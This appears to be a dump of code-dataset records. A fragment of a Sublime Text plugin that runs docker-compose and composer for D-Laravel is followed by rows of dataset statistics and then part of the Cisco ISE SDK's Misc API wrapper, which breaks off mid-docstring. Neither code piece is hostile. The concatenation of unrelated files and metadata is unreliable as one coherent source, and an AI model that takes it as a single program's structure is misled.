    soon as the branch runs. The success message also said "down" although
    the command run is ``ps``.
    """

    def run(self, edit):
        self.window = self.view.window()

        def run_command():
            folder = self.window.extract_variables()['folder']
            arg = "ps".split()
            dlaravel_project = re.sub(".*sites/(.+$)", "\\1", folder)
            dlaravel_basepath = re.sub("(^.*)/sites/(.+$)", "\\1", folder)
            # First pass without ANSI colors to probe the compose file.
            command = ["docker-compose", "--no-ansi", "-f",
                       "{}/docker-compose.yml".format(dlaravel_basepath)] + arg
            proc = Popen(command, bufsize=1, stdout=PIPE, stderr=PIPE, universal_newlines=True)
            output, error = proc.communicate()
            proc.wait()
            print(error)
            if (proc.poll() == 0):
                # Fix: was `"console down Success" % command` (TypeError).
                self.view.set_status("Dlaravel", "console ps Success")
                # Re-run with colors for the console display.
                arg = "ps".split()
                command = ["docker-compose", "-f",
                           "{}/docker-compose.yml".format(dlaravel_basepath)] + arg
                proc = Popen(command, bufsize=1, stdout=PIPE, stderr=PIPE, universal_newlines=True)
                output = proc.communicate()[0]
                print(output)
                self.window.run_command("show_panel", {"panel": "console", "toggle": True})
            else:
                # Fix: was `"Error" % command` (TypeError).
                self.view.set_status("Dlaravel", "Error: {}".format(' '.join(command)))
                print(error)
                self.window.run_command("show_panel", {"panel": "console", "toggle": True})

        self.window = self.view.window()
        this_thread = Thread(target=run_command)
        this_thread.start()
class DockerComposeCommand(sublime_plugin.TextCommand):
    """Run an arbitrary docker-compose command for the current project.

    When invoked with a `parameters` argument the command runs immediately;
    otherwise an input panel prompts for the docker-compose arguments.
    """

    def run(self, edit, **args):
        self.window = self.view.window()
        folder = self.window.extract_variables()['folder']

        def run_command(*args):
            """Execute docker-compose with the given arguments."""
            dlaravel_basepath = re.sub("(^.*)/sites/(.+$)", "\\1", folder)
            # BUG FIX: the message said "composer" although this runs
            # docker-compose.
            print("Command is issued (docker-compose {})".format(' '.join(list(args))))
            parameter = list(args)
            if "exec" in args:
                # No TTY is attached to the plugin, so exec needs -T.
                parameter = ["exec", "-T"] + parameter[1:]
            if "up" in args:
                # Always detach so the plugin thread is not blocked.
                parameter = parameter + ["-d"]
            command = ["docker-compose", "--no-ansi", "-f",
                       "{}/docker-compose.yml".format(dlaravel_basepath)] + parameter
            proc = Popen(command, bufsize=0, stdout=PIPE, stderr=PIPE,
                         universal_newlines=True)
            output, error = proc.communicate()
            proc.wait()
            if proc.poll() == 0:
                # BUG FIX: `"Success" % command` raised TypeError (format
                # string has no placeholder for the list operand).
                self.view.set_status("Dlaravel",
                                     "Success: {}".format(' '.join(command)))
                print(output)
            else:
                self.view.set_status("Dlaravel",
                                     "Error: {}".format(' '.join(command)))
                print(error)
            self.window.run_command("show_panel",
                                    {"panel": "console", "toggle": True})

        def on_done(command):
            this_thread = Thread(target=run_command, args=command.split())
            this_thread.start()

        if args:
            run_command(*args['parameters'])
        else:
            self.window.show_input_panel("docker-compose", "", on_done, None, None)
class ComposerCommand(sublime_plugin.TextCommand):
    """Prompt for and run a composer command inside the php container."""

    def run(self, edit, *args):
        self.args = args
        self.window = self.view.window()
        # ===== Check Project Folder ===========
        # Prefer the folder of the open file (<base>/sites/<project>/...);
        # fall back to the window's project folder when no file is open.
        try:
            file = self.window.extract_variables()['file']
            dlaravel_folder = re.sub("^(.+?)(/sites/)(.+?)/(.+?)$", "\\1", file)
            project_folder = re.sub("^(.+?)(/sites/)(.+?)/(.+?)$", "\\3", file)
            folder = "{}/sites/{}".format(dlaravel_folder, project_folder)
        except KeyError:
            # BUG FIX: was a bare `except:`; only a missing 'file' variable
            # should trigger the fallback.
            folder = self.window.extract_variables()['folder']
            dlaravel_folder = re.sub("^(.+?)(/sites/)(.+?)$", "\\1", folder)
        try:
            # BUG FIX: the file handle was never closed; use a context manager.
            with open("{}/etc/dlaravel-release".format(dlaravel_folder), "r") as fh:
                dlaravel_release = fh.read()
            print("Project Folder: {}".format(folder))
            print(dlaravel_release)
        except OSError:
            # BUG FIX: was a bare `except:`; only file-system errors indicate
            # a missing D-Laravel installation.
            print("Unable to find D-Laravel folder.")
            print("You can download it at https://github.com/DevinY/dlaravel.")
            self.window.run_command("show_panel",
                                    {"panel": "console", "toggle": True})
            self.view.set_status("Dlaravel", "Unable to find D-Laravel")
            return False
        self.view.set_status("Dlaravel",
                             "artisan command will be run in {}".format(folder))
        project_folder = re.sub("^(.+?)(/sites/)(.+?)$", "\\3", folder)
        # ===============================

        def run_command(*args):
            """Worker thread: execute `composer <args>` and report status."""
            dlaravel_project = re.sub(".*sites/(.+$)", "\\1", folder)
            dlaravel_basepath = re.sub("(^.*)/sites/(.+$)", "\\1", folder)
            args = list(args)
            if "composer" in args:
                # Users may type "composer update" as well as just "update";
                # drop the leading word in that case.
                del args[0]
            self.window.run_command("show_panel",
                                    {"panel": "console", "toggle": True})
            msg = 'Command is issued (composer {}), Please wait...'.format(' '.join(list(args)))
            print(msg)
            self.view.set_status("Dlaravel", msg)
            command = ["docker-compose", "-f",
                       "{}/docker-compose.yml".format(dlaravel_basepath),
                       "exec", "-w", "/var/www/html/{}".format(dlaravel_project),
                       "-u", "dlaravel", "-T", "php", "composer"] + args
            proc = Popen(command, bufsize=0, stdout=PIPE, stderr=PIPE,
                         universal_newlines=True)
            output, error = proc.communicate()
            proc.wait()
            exit_code = proc.poll()
            self.window.run_command("show_panel", {"panel": "console"})
            if exit_code == 0:
                self.view.set_status("Dlaravel",
                                     "composer {} is done.".format(' '.join(args)))
                print(output)
                self.window.run_command("hide_panel", {"panel": "console"})
            else:
                self.view.set_status("Dlaravel", "Unable to find D-Laravel")
                print(error)

        def on_done(command):
            args = command.split()
            this_thread = Thread(target=run_command, args=args)
            this_thread.start()

        self.window.show_input_panel("({}) composer".format(project_folder),
                                     "", on_done, None, None)
class ConsoleUpCommand(sublime_plugin.TextCommand):
    """Bring the D-Laravel containers up (`docker-compose up -d`)."""

    def run(self, edit):
        def run_command(*args):
            """Worker thread: run `up -d --remove-orphans`, then show `ps`."""
            folder = self.window.extract_variables()['folder']
            dlaravel_basepath = re.sub("(^.*)/sites/(.+$)", "\\1", folder)
            compose_file = "{}/docker-compose.yml".format(dlaravel_basepath)
            command = ["docker-compose", "-f", compose_file] + \
                "up -d --remove-orphans".split()
            print(command)
            proc = Popen(command, bufsize=1, stdout=PIPE, stderr=PIPE,
                         universal_newlines=True)
            output, error = proc.communicate()
            proc.wait()
            if proc.poll() == 0:
                # BUG FIX: the original used `"console up success" % command`,
                # which raises TypeError because the format string has no
                # placeholder for the list operand.
                self.view.set_status("Dlaravel", "console up success")
                # Show the resulting container status.
                proc = Popen(["docker-compose", "-f", compose_file, "ps"],
                             bufsize=1, stdout=PIPE, stderr=PIPE,
                             universal_newlines=True)
                output = proc.communicate()[0]
                print(output)
            else:
                # BUG FIX: `"Error" % command` had the same TypeError.
                self.view.set_status("Dlaravel",
                                     "Error: {}".format(' '.join(command)))
                print(error)
            self.window.run_command("show_panel",
                                    {"panel": "console", "toggle": True})

        self.window = self.view.window()
        this_thread = Thread(target=run_command)
        this_thread.start()
class ConsoleDownCommand(sublime_plugin.TextCommand):
    """Stop the D-Laravel containers (`docker-compose down`)."""

    def run(self, edit):
        self.window = self.view.window()

        def run_command():
            """Worker thread: run `down`, then show the remaining `ps` state."""
            folder = self.window.extract_variables()['folder']
            dlaravel_basepath = re.sub("(^.*)/sites/(.+$)", "\\1", folder)
            compose_file = "{}/docker-compose.yml".format(dlaravel_basepath)
            command = ["docker-compose", "--no-ansi", "-f", compose_file, "down"]
            proc = Popen(command, bufsize=1, stdout=PIPE, stderr=PIPE,
                         universal_newlines=True)
            output, error = proc.communicate()
            proc.wait()
            # docker-compose reports progress on stderr even on success.
            print(error)
            if proc.poll() == 0:
                # BUG FIX: the original used `"console down Success" % command`,
                # which raises TypeError because the format string has no
                # placeholder for the list operand.
                self.view.set_status("Dlaravel", "console down Success")
                # Show what (if anything) is still running.
                proc = Popen(["docker-compose", "-f", compose_file, "ps"],
                             bufsize=1, stdout=PIPE, stderr=PIPE,
                             universal_newlines=True)
                output = proc.communicate()[0]
                print(output)
            else:
                # BUG FIX: `"Error" % command` had the same TypeError.
                self.view.set_status("Dlaravel",
                                     "Error: {}".format(' '.join(command)))
                print(error)
            self.window.run_command("show_panel",
                                    {"panel": "console", "toggle": True})

        this_thread = Thread(target=run_command)
        this_thread.start()
| 48.367213
| 203
| 0.557416
| 1,602
| 14,752
| 5.006866
| 0.094257
| 0.054856
| 0.027428
| 0.024685
| 0.871338
| 0.844284
| 0.822591
| 0.78656
| 0.760878
| 0.760878
| 0
| 0.004502
| 0.262202
| 14,752
| 305
| 204
| 48.367213
| 0.732451
| 0.019184
| 0
| 0.74902
| 0
| 0
| 0.185131
| 0.030982
| 0
| 0
| 0
| 0
| 0
| 1
| 0.07451
| false
| 0
| 0.011765
| 0
| 0.121569
| 0.121569
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0aabfb486b1558fcfbd748b7f9ab785d40e64894
| 43,273
|
py
|
Python
|
ciscoisesdk/api/v3_1_1/misc.py
|
CiscoISE/ciscoisesdk
|
860b0fc7cc15d0c2a39c64608195a7ab3d5f4885
|
[
"MIT"
] | 36
|
2021-05-18T16:24:19.000Z
|
2022-03-05T13:44:41.000Z
|
ciscoisesdk/api/v3_1_1/misc.py
|
CiscoISE/ciscoisesdk
|
860b0fc7cc15d0c2a39c64608195a7ab3d5f4885
|
[
"MIT"
] | 15
|
2021-06-08T19:03:37.000Z
|
2022-02-25T14:47:33.000Z
|
ciscoisesdk/api/v3_1_1/misc.py
|
CiscoISE/ciscoisesdk
|
860b0fc7cc15d0c2a39c64608195a7ab3d5f4885
|
[
"MIT"
] | 6
|
2021-06-10T09:32:01.000Z
|
2022-01-12T08:34:39.000Z
|
# -*- coding: utf-8 -*-
"""Cisco Identity Services Engine Misc API wrapper.
Copyright (c) 2021 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
from builtins import *
from past.builtins import basestring
from ...restsession import RestSession
from ...utils import (
check_type,
dict_from_items_with_values,
apply_path_params,
dict_of_str,
get_next_page,
)
class Misc(object):
"""Identity Services Engine Misc API (version: 3.1.1).
Wraps the Identity Services Engine Misc
API and exposes the API as native Python
methods that return native Python objects.
"""
def __init__(self, session, object_factory, request_validator):
    """Initialize a new Misc
    object with the provided RestSession.
    Args:
        session(RestSession): The RESTful session object to be used for
            API calls to the Identity Services Engine service.
    Raises:
        TypeError: If the parameter types are incorrect.
    """
    # Fail fast if the session is not a RestSession.
    check_type(session, RestSession)
    super(Misc, self).__init__()
    # Shared REST session used by every wrapper method below.
    self._session = session
    # Factory that turns raw API responses into model objects.
    self._object_factory = object_factory
    # Stored for parity with other wrappers; not used by the methods
    # visible here.
    self._request_validator = request_validator
def get_active_count(self,
                     headers=None,
                     **query_parameters):
    """ActiveCount.

    Args:
        headers(dict): Dictionary of HTTP Headers to send with the Request.
        **query_parameters: Additional query parameters (provides
            support for parameters that may be added in the future).

    Returns:
        RestResponse: REST response with ``headers``, ``response``,
        ``content`` and ``text`` properties.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the Identity Services Engine cloud returns an error.
    """
    check_type(headers, dict)
    if headers is not None and 'Accept' in headers:
        check_type(headers.get('Accept'), basestring, may_be_none=False)

    # Merge the session's default headers with any caller-supplied ones.
    _headers = self._session.headers or {}
    with_custom_headers = bool(headers)
    if with_custom_headers:
        _headers.update(dict_of_str(headers))

    _params = dict_from_items_with_values(dict(query_parameters))

    endpoint_full_url = apply_path_params(
        '/admin/API/mnt/Session/ActiveCount', {})
    request_kwargs = {'params': _params}
    if with_custom_headers:
        request_kwargs['headers'] = _headers
    _api_response = self._session.get(endpoint_full_url, **request_kwargs)

    return self._object_factory('bpm_e629f554fa652d980ff08988c788c57_v3_1_1',
                                _api_response)
def get_active_list(self,
                    headers=None,
                    **query_parameters):
    """ActiveList.

    Args:
        headers(dict): Dictionary of HTTP Headers to send with the Request.
        **query_parameters: Additional query parameters (provides
            support for parameters that may be added in the future).

    Returns:
        RestResponse: REST response with ``headers``, ``response``,
        ``content`` and ``text`` properties.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the Identity Services Engine cloud returns an error.
    """
    check_type(headers, dict)
    if headers is not None and 'Accept' in headers:
        check_type(headers.get('Accept'), basestring, may_be_none=False)

    # Merge the session's default headers with any caller-supplied ones.
    _headers = self._session.headers or {}
    with_custom_headers = bool(headers)
    if with_custom_headers:
        _headers.update(dict_of_str(headers))

    _params = dict_from_items_with_values(dict(query_parameters))

    endpoint_full_url = apply_path_params(
        '/admin/API/mnt/Session/ActiveList', {})
    request_kwargs = {'params': _params}
    if with_custom_headers:
        request_kwargs['headers'] = _headers
    _api_response = self._session.get(endpoint_full_url, **request_kwargs)

    return self._object_factory('bpm_a6c71a1e4d2597ea1b5533e9f1b438f_v3_1_1',
                                _api_response)
def get_session_auth_list(self,
                          headers=None,
                          **query_parameters):
    """Session/AuthList.

    Args:
        headers(dict): Dictionary of HTTP Headers to send with the Request.
        **query_parameters: Additional query parameters (provides
            support for parameters that may be added in the future).

    Returns:
        RestResponse: REST response with ``headers``, ``response``,
        ``content`` and ``text`` properties.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the Identity Services Engine cloud returns an error.
    """
    check_type(headers, dict)
    if headers is not None and 'Accept' in headers:
        check_type(headers.get('Accept'), basestring, may_be_none=False)

    # Merge the session's default headers with any caller-supplied ones.
    _headers = self._session.headers or {}
    with_custom_headers = bool(headers)
    if with_custom_headers:
        _headers.update(dict_of_str(headers))

    _params = dict_from_items_with_values(dict(query_parameters))

    endpoint_full_url = apply_path_params(
        '/admin/API/mnt/Session/AuthList/null/null', {})
    request_kwargs = {'params': _params}
    if with_custom_headers:
        request_kwargs['headers'] = _headers
    _api_response = self._session.get(endpoint_full_url, **request_kwargs)

    return self._object_factory('bpm_d91e71e5b84583fb8ea91fcd9fb6751_v3_1_1',
                                _api_response)
def get_posture_count(self,
                      headers=None,
                      **query_parameters):
    """PostureCount.

    Args:
        headers(dict): Dictionary of HTTP Headers to send with the Request.
        **query_parameters: Additional query parameters (provides
            support for parameters that may be added in the future).

    Returns:
        RestResponse: REST response with ``headers``, ``response``,
        ``content`` and ``text`` properties.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the Identity Services Engine cloud returns an error.
    """
    check_type(headers, dict)
    if headers is not None and 'Accept' in headers:
        check_type(headers.get('Accept'), basestring, may_be_none=False)

    # Merge the session's default headers with any caller-supplied ones.
    _headers = self._session.headers or {}
    with_custom_headers = bool(headers)
    if with_custom_headers:
        _headers.update(dict_of_str(headers))

    _params = dict_from_items_with_values(dict(query_parameters))

    endpoint_full_url = apply_path_params(
        '/admin/API/mnt/Session/PostureCount', {})
    request_kwargs = {'params': _params}
    if with_custom_headers:
        request_kwargs['headers'] = _headers
    _api_response = self._session.get(endpoint_full_url, **request_kwargs)

    return self._object_factory('bpm_d51ebdbbc75c0f8ed6161ae070a276_v3_1_1',
                                _api_response)
def get_profiler_count(self,
                       headers=None,
                       **query_parameters):
    """ProfilerCount.

    Args:
        headers(dict): Dictionary of HTTP Headers to send with the Request.
        **query_parameters: Additional query parameters (provides
            support for parameters that may be added in the future).

    Returns:
        RestResponse: REST response with ``headers``, ``response``,
        ``content`` and ``text`` properties.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the Identity Services Engine cloud returns an error.
    """
    check_type(headers, dict)
    if headers is not None and 'Accept' in headers:
        check_type(headers.get('Accept'), basestring, may_be_none=False)

    # Merge the session's default headers with any caller-supplied ones.
    _headers = self._session.headers or {}
    with_custom_headers = bool(headers)
    if with_custom_headers:
        _headers.update(dict_of_str(headers))

    _params = dict_from_items_with_values(dict(query_parameters))

    endpoint_full_url = apply_path_params(
        '/admin/API/mnt/Session/ProfilerCount', {})
    request_kwargs = {'params': _params}
    if with_custom_headers:
        request_kwargs['headers'] = _headers
    _api_response = self._session.get(endpoint_full_url, **request_kwargs)

    return self._object_factory('bpm_bdb77066ba75002bd343de0e9120b86_v3_1_1',
                                _api_response)
def get_sessions_by_mac(self,
                        mac,
                        headers=None,
                        **query_parameters):
    """Sessions by MAC.

    Args:
        mac(basestring): mac path parameter.
        headers(dict): Dictionary of HTTP Headers to send with the Request.
        **query_parameters: Additional query parameters (provides
            support for parameters that may be added in the future).

    Returns:
        RestResponse: REST response with ``headers``, ``response``,
        ``content`` and ``text`` properties.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the Identity Services Engine cloud returns an error.
    """
    check_type(headers, dict)
    if headers is not None and 'Accept' in headers:
        check_type(headers.get('Accept'), basestring, may_be_none=False)

    # Merge the session's default headers with any caller-supplied ones.
    _headers = self._session.headers or {}
    with_custom_headers = bool(headers)
    if with_custom_headers:
        _headers.update(dict_of_str(headers))

    check_type(mac, basestring, may_be_none=False)

    _params = dict_from_items_with_values(dict(query_parameters))

    endpoint_full_url = apply_path_params(
        '/admin/API/mnt/Session/MACAddress/{mac}', {'mac': mac})
    request_kwargs = {'params': _params}
    if with_custom_headers:
        request_kwargs['headers'] = _headers
    _api_response = self._session.get(endpoint_full_url, **request_kwargs)

    return self._object_factory('bpm_b93e1accc1f35864b9a5b7bc478c7a7c_v3_1_1',
                                _api_response)
def get_sessions_by_username(self,
                             username,
                             headers=None,
                             **query_parameters):
    """Sessions by Username.

    Args:
        username(basestring): username path parameter.
        headers(dict): Dictionary of HTTP Headers to send with the Request.
        **query_parameters: Additional query parameters (provides
            support for parameters that may be added in the future).

    Returns:
        RestResponse: REST response with ``headers``, ``response``,
        ``content`` and ``text`` properties.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the Identity Services Engine cloud returns an error.
    """
    check_type(headers, dict)
    if headers is not None and 'Accept' in headers:
        check_type(headers.get('Accept'), basestring, may_be_none=False)

    # Merge the session's default headers with any caller-supplied ones.
    _headers = self._session.headers or {}
    with_custom_headers = bool(headers)
    if with_custom_headers:
        _headers.update(dict_of_str(headers))

    check_type(username, basestring, may_be_none=False)

    _params = dict_from_items_with_values(dict(query_parameters))

    endpoint_full_url = apply_path_params(
        '/admin/API/mnt/Session/UserName/{username}', {'username': username})
    request_kwargs = {'params': _params}
    if with_custom_headers:
        request_kwargs['headers'] = _headers
    _api_response = self._session.get(endpoint_full_url, **request_kwargs)

    return self._object_factory('bpm_e037613954b58692d89d64eba681_v3_1_1',
                                _api_response)
def get_sessions_by_nas_ip(self,
                           nas_ipv4,
                           headers=None,
                           **query_parameters):
    """Sessions by NAS IP.

    Args:
        nas_ipv4(basestring): nas_ipv4 path parameter.
        headers(dict): Dictionary of HTTP Headers to send with the Request.
        **query_parameters: Additional query parameters (provides
            support for parameters that may be added in the future).

    Returns:
        RestResponse: REST response with ``headers``, ``response``,
        ``content`` and ``text`` properties.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the Identity Services Engine cloud returns an error.
    """
    check_type(headers, dict)
    if headers is not None and 'Accept' in headers:
        check_type(headers.get('Accept'), basestring, may_be_none=False)

    # Merge the session's default headers with any caller-supplied ones.
    _headers = self._session.headers or {}
    with_custom_headers = bool(headers)
    if with_custom_headers:
        _headers.update(dict_of_str(headers))

    check_type(nas_ipv4, basestring, may_be_none=False)

    _params = dict_from_items_with_values(dict(query_parameters))

    endpoint_full_url = apply_path_params(
        '/admin/API/mnt/Session/IPAddress/{nas_ipv4}', {'nas_ipv4': nas_ipv4})
    request_kwargs = {'params': _params}
    if with_custom_headers:
        request_kwargs['headers'] = _headers
    _api_response = self._session.get(endpoint_full_url, **request_kwargs)

    return self._object_factory('bpm_fb7171efd5df8a0fe319983882265_v3_1_1',
                                _api_response)
def get_sessions_by_endpoint_ip(self,
                                endpoint_ipv4,
                                headers=None,
                                **query_parameters):
    """Sessions by Endpoint IP.

    Args:
        endpoint_ipv4(basestring): endpoint_ipv4 path parameter.
        headers(dict): Dictionary of HTTP Headers to send with the Request.
        **query_parameters: Additional query parameters (provides
            support for parameters that may be added in the future).

    Returns:
        RestResponse: REST response with ``headers``, ``response``,
        ``content`` and ``text`` properties.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the Identity Services Engine cloud returns an error.
    """
    check_type(headers, dict)
    if headers is not None and 'Accept' in headers:
        check_type(headers.get('Accept'), basestring, may_be_none=False)

    # Merge the session's default headers with any caller-supplied ones.
    _headers = self._session.headers or {}
    with_custom_headers = bool(headers)
    if with_custom_headers:
        _headers.update(dict_of_str(headers))

    check_type(endpoint_ipv4, basestring, may_be_none=False)

    _params = dict_from_items_with_values(dict(query_parameters))

    endpoint_full_url = apply_path_params(
        '/admin/API/mnt/Session/EndPointIPAddress/{endpoint_ipv4}',
        {'endpoint_ipv4': endpoint_ipv4})
    request_kwargs = {'params': _params}
    if with_custom_headers:
        request_kwargs['headers'] = _headers
    _api_response = self._session.get(endpoint_full_url, **request_kwargs)

    return self._object_factory('bpm_c7f72c6db5ecbb380133c106d0566_v3_1_1',
                                _api_response)
def get_sessions_by_session_id(self,
                               session_id,
                               headers=None,
                               **query_parameters):
    """Sessions by SessionID.

    Args:
        session_id(basestring): session_id path parameter.
        headers(dict): Dictionary of HTTP Headers to send with the Request.
        **query_parameters: Additional query parameters (provides
            support for parameters that may be added in the future).

    Returns:
        RestResponse: REST response with ``headers``, ``response``,
        ``content`` and ``text`` properties.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the Identity Services Engine cloud returns an error.
    """
    check_type(headers, dict)
    if headers is not None and 'Accept' in headers:
        check_type(headers.get('Accept'), basestring, may_be_none=False)

    # Merge the session's default headers with any caller-supplied ones.
    _headers = self._session.headers or {}
    with_custom_headers = bool(headers)
    if with_custom_headers:
        _headers.update(dict_of_str(headers))

    check_type(session_id, basestring, may_be_none=False)

    _params = dict_from_items_with_values(dict(query_parameters))

    endpoint_full_url = apply_path_params(
        '/admin/API/mnt/Session/Active/SessionID/{session_id}/0',
        {'session_id': session_id})
    request_kwargs = {'params': _params}
    if with_custom_headers:
        request_kwargs['headers'] = _headers
    _api_response = self._session.get(endpoint_full_url, **request_kwargs)

    return self._object_factory('bpm_eb415db854f5b12aa326bde54285c59_v3_1_1',
                                _api_response)
def delete_all_sessions(self,
                        headers=None,
                        **query_parameters):
    """Delete All Sessions.

    Args:
        headers(dict): Dictionary of HTTP Headers to send with the Request.
        **query_parameters: Additional query parameters (provides
            support for parameters that may be added in the future).

    Returns:
        RestResponse: REST response with ``headers``, ``response``,
        ``content`` and ``text`` properties.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the Identity Services Engine cloud returns an error.
    """
    check_type(headers, dict)
    if headers is not None and 'Accept' in headers:
        check_type(headers.get('Accept'), basestring, may_be_none=False)

    # Merge the session's default headers with any caller-supplied ones.
    _headers = self._session.headers or {}
    with_custom_headers = bool(headers)
    if with_custom_headers:
        _headers.update(dict_of_str(headers))

    _params = dict_from_items_with_values(dict(query_parameters))

    endpoint_full_url = apply_path_params(
        '/admin/API/mnt/Session/Delete/All', {})
    request_kwargs = {'params': _params}
    if with_custom_headers:
        request_kwargs['headers'] = _headers
    # Unlike the read-only wrappers, this endpoint uses HTTP DELETE.
    _api_response = self._session.delete(endpoint_full_url, **request_kwargs)

    return self._object_factory('bpm_bd2a2c3735c6ca7b59c86d428e222_v3_1_1',
                                _api_response)
def get_mnt_version(self,
                    headers=None,
                    **query_parameters):
    """MNT Version.

    Args:
        headers(dict): Dictionary of HTTP Headers to send with the Request.
        **query_parameters: Additional query parameters (provides
            support for parameters that may be added in the future).

    Returns:
        RestResponse: REST response with ``headers``, ``response``,
        ``content`` and ``text`` properties.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the Identity Services Engine cloud returns an error.
    """
    check_type(headers, dict)
    if headers is not None and 'Accept' in headers:
        check_type(headers.get('Accept'), basestring, may_be_none=False)

    # Merge the session's default headers with any caller-supplied ones.
    _headers = self._session.headers or {}
    with_custom_headers = bool(headers)
    if with_custom_headers:
        _headers.update(dict_of_str(headers))

    _params = dict_from_items_with_values(dict(query_parameters))

    endpoint_full_url = apply_path_params('/admin/API/mnt/Version', {})
    request_kwargs = {'params': _params}
    if with_custom_headers:
        request_kwargs['headers'] = _headers
    _api_response = self._session.get(endpoint_full_url, **request_kwargs)

    return self._object_factory('bpm_fc354ec4d361514a8e949f628f8e5f89_v3_1_1',
                                _api_response)
def get_failure_reasons(self,
                        headers=None,
                        **query_parameters):
    """FailureReasons.

    Args:
        headers(dict): Dictionary of HTTP Headers to send with the Request.
        **query_parameters: Additional query parameters (provides
            support for parameters that may be added in the future).

    Returns:
        RestResponse: REST response with ``headers``, ``response``,
        ``content`` and ``text`` properties.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the Identity Services Engine cloud returns an error.
    """
    check_type(headers, dict)
    if headers is not None and 'Accept' in headers:
        check_type(headers.get('Accept'), basestring, may_be_none=False)

    # Merge the session's default headers with any caller-supplied ones.
    _headers = self._session.headers or {}
    with_custom_headers = bool(headers)
    if with_custom_headers:
        _headers.update(dict_of_str(headers))

    _params = dict_from_items_with_values(dict(query_parameters))

    endpoint_full_url = apply_path_params('/admin/API/mnt/FailureReasons', {})
    request_kwargs = {'params': _params}
    if with_custom_headers:
        request_kwargs['headers'] = _headers
    _api_response = self._session.get(endpoint_full_url, **request_kwargs)

    return self._object_factory('bpm_e346dbd9f9df554da3a3bcc06f4e77d5_v3_1_1',
                                _api_response)
def get_authentication_status_by_mac(self,
                                     mac,
                                     rec_ord_s,
                                     sec_ond_s,
                                     headers=None,
                                     **query_parameters):
    """Fetch AuthenticationStatus records for a MAC address.

    Args:
        mac(basestring): MAC path parameter.
        sec_ond_s(basestring): SECONDS path parameter.
        rec_ord_s(basestring): RECORDS path parameter.
        headers(dict): Dictionary of HTTP headers to send with the request.
        **query_parameters: Additional query parameters (provides support
            for parameters that may be added in the future).

    Returns:
        RestResponse: REST response with following properties:
            - headers(MyDict): response headers.
            - response(MyDict): response body as a MyDict object.
            - content(bytes): representation of the request's response.
            - text(str): representation of the request's response.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the Identity Services Engine cloud returns an error.
    """
    check_type(headers, dict)
    if headers is not None and 'Accept' in headers:
        check_type(headers.get('Accept'), basestring, may_be_none=False)

    request_headers = self._session.headers or {}
    use_custom_headers = bool(headers)
    if headers:
        request_headers.update(dict_of_str(headers))

    # Path parameters are mandatory; validation order kept from the original.
    check_type(mac, basestring, may_be_none=False)
    check_type(sec_ond_s, basestring, may_be_none=False)
    check_type(rec_ord_s, basestring, may_be_none=False)

    request_params = dict_from_items_with_values(dict(query_parameters))
    path_params = {
        'MAC': mac,
        'SECONDS': sec_ond_s,
        'RECORDS': rec_ord_s,
    }
    endpoint_full_url = apply_path_params(
        '/admin/API/mnt/AuthStatus/MACAddress/{MAC}/{SECONDS}/{RECORDS}/All',
        path_params)
    if use_custom_headers:
        raw_response = self._session.get(endpoint_full_url,
                                         params=request_params,
                                         headers=request_headers)
    else:
        raw_response = self._session.get(endpoint_full_url,
                                         params=request_params)
    return self._object_factory('bpm_b26746235997bc32ace7d67d6987_v3_1_1', raw_response)
def session_reauthentication_by_mac(self,
                                    end_poi_ntm_ac,
                                    psn_nam_e,
                                    rea_uth_typ_e,
                                    headers=None,
                                    **query_parameters):
    """Trigger session reauthentication for an endpoint MAC via CoA.

    Args:
        psn_nam_e(basestring): PSN_NAME path parameter.
        end_poi_ntm_ac(basestring): ENDPOINT_MAC path parameter.
        rea_uth_typ_e(basestring): REAUTH_TYPE path parameter.
        headers(dict): Dictionary of HTTP headers to send with the request.
        **query_parameters: Additional query parameters (provides support
            for parameters that may be added in the future).

    Returns:
        RestResponse: REST response with following properties:
            - headers(MyDict): response headers.
            - response(MyDict): response body as a MyDict object.
            - content(bytes): representation of the request's response.
            - text(str): representation of the request's response.

    Raises:
